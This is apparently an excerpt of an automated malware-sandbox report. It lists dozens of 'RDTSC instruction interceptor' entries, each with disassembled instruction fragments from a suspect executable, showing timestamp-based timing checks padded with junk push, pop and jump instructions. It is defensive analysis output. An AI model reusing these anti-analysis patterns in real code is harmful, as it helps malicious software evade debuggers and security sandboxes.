Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183DDD3 second address: 183DE58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sub dword ptr [ebp+129C285Dh], ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7B216C3178h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jmp 00007F7B216C317Ah 0x00000032 xor edi, dword ptr [ebp+129C39D7h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F7B216C3178h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 add dword ptr [ebp+129C285Dh], eax 0x0000005a xchg eax, esi 0x0000005b jp 00007F7B216C3184h 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183DE58 second address: 183DE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7B212E85C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F7B212E85DBh 0x00000014 jmp 00007F7B212E85D5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18346F4 second address: 18346F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183576B second address: 1835779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F7B212E85C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183EDF4 second address: 183EDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183EDF8 second address: 183EE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7B212E85C8h 0x00000011 pop edx 0x00000012 nop 0x00000013 mov dword ptr [ebp+129C1D16h], edx 0x00000019 jnp 00007F7B212E85CCh 0x0000001f push 00000000h 0x00000021 mov di, B10Ch 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F7B212E85C8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 call 00007F7B212E85CFh 0x00000046 xor bh, 00000011h 0x00000049 pop ebx 0x0000004a xchg eax, esi 0x0000004b jmp 00007F7B212E85D9h 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F7B212E85D9h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1835779 second address: 1835801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F7B216C3178h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 jmp 00007F7B216C317Ch 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+129C2959h], eax 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F7B216C3178h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov bx, cx 0x00000059 mov eax, dword ptr [ebp+129C0B65h] 0x0000005f mov edi, 5478EF9Eh 0x00000064 push FFFFFFFFh 0x00000066 sub di, 45A2h 0x0000006b push eax 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F7B216C3176h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1837878 second address: 183787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183787C second address: 1837880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1842DE1 second address: 1842DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183B06A second address: 183B078 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183B078 second address: 183B09C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7B212E85D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183CE56 second address: 183CE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183E02E second address: 183E032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1846636 second address: 184664B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B216C3187h 0x00000008 jmp 00007F7B216C317Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 184664B second address: 1846658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F7B212E85C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 184A591 second address: 184A595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 184F90E second address: 184F916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185139E second address: 18513CA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C3178h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e ja 00007F7B216C3182h 0x00000014 jns 00007F7B216C317Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18513CA second address: 18513D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18513D4 second address: 18513D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515D4 second address: 18515DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7B212E85C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515DF second address: 18515E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515E5 second address: 18515E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515E9 second address: 1851601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1851601 second address: 1851606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855FF1 second address: 1855FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855FF5 second address: 185601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F7B212E85C6h 0x00000010 jmp 00007F7B212E85D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185601D second address: 1856021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855296 second address: 185529C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18553E1 second address: 185543E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C317Eh 0x00000008 jbe 00007F7B216C3190h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F7B216C317Fh 0x0000001a pop edi 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F7B216C3182h 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185543E second address: 1855444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556E1 second address: 18556E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556E5 second address: 18556EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556EE second address: 18556F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556F5 second address: 18556FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556FF second address: 1855721 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7B216C317Bh 0x0000000f jmp 00007F7B216C317Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855721 second address: 1855727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855727 second address: 1855731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7B216C3176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855731 second address: 1855735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18558D3 second address: 18558F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B216C3176h 0x00000008 jmp 00007F7B216C317Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18558F5 second address: 18558FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855A43 second address: 1855A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855BB1 second address: 1855BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F7B212E85D4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855D44 second address: 1855D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855D52 second address: 1855D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185DEFE second address: 185DF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E211 second address: 185E217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E217 second address: 185E26E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3183h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 jmp 00007F7B216C317Fh 0x00000017 pop esi 0x00000018 jnp 00007F7B216C3193h 0x0000001e jmp 00007F7B216C3187h 0x00000023 jnc 00007F7B216C3176h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E3BE second address: 185E3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E66E second address: 185E689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C317Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1897B0F second address: 1897B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189CF5E second address: 189CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F7B212E85D1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F7B212E85DEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189CF95 second address: 189CFB4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7B216C318Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F7B216C3182h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A200B second address: 18A2011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A2011 second address: 18A2019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A2019 second address: 18A201D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A2322 second address: 18A2327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18AE728 second address: 18AE74E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B212E85C6h 0x00000008 jmp 00007F7B212E85CFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7B212E85CBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18AE74E second address: 18AE754 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B369E second address: 18B36A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B65AF second address: 18B65C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F7B216C3176h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B65C4 second address: 18B65CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B65CE second address: 18B65E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F7B216C3176h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B91F8 second address: 18B9224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F7B212E85C6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7B212E85CDh 0x0000001c push edi 0x0000001d jl 00007F7B212E85C6h 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B9224 second address: 18B9229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B9229 second address: 18B9233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18BD855 second address: 18BD873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ch 0x00000007 jnl 00007F7B216C3176h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18BD873 second address: 18BD878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18BD878 second address: 18BD884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F7B216C3176h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18C6D21 second address: 18C6D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jnl 00007F7B212E85CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7B212E85CEh 0x00000017 jp 00007F7B212E85C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CA76E second address: 18CA777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CED33 second address: 18CED39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CED39 second address: 18CED3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CED3F second address: 18CED45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CEEAD second address: 18CEED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7B216C3186h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CEED0 second address: 18CEED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF010 second address: 18CF017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF017 second address: 18CF01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF01D second address: 18CF02F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F7B216C3176h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF16C second address: 18CF174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D1FF2 second address: 18D2017 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F7B216C317Bh 0x0000000e jbe 00007F7B216C3176h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F7B216C3176h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D2017 second address: 18D201B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
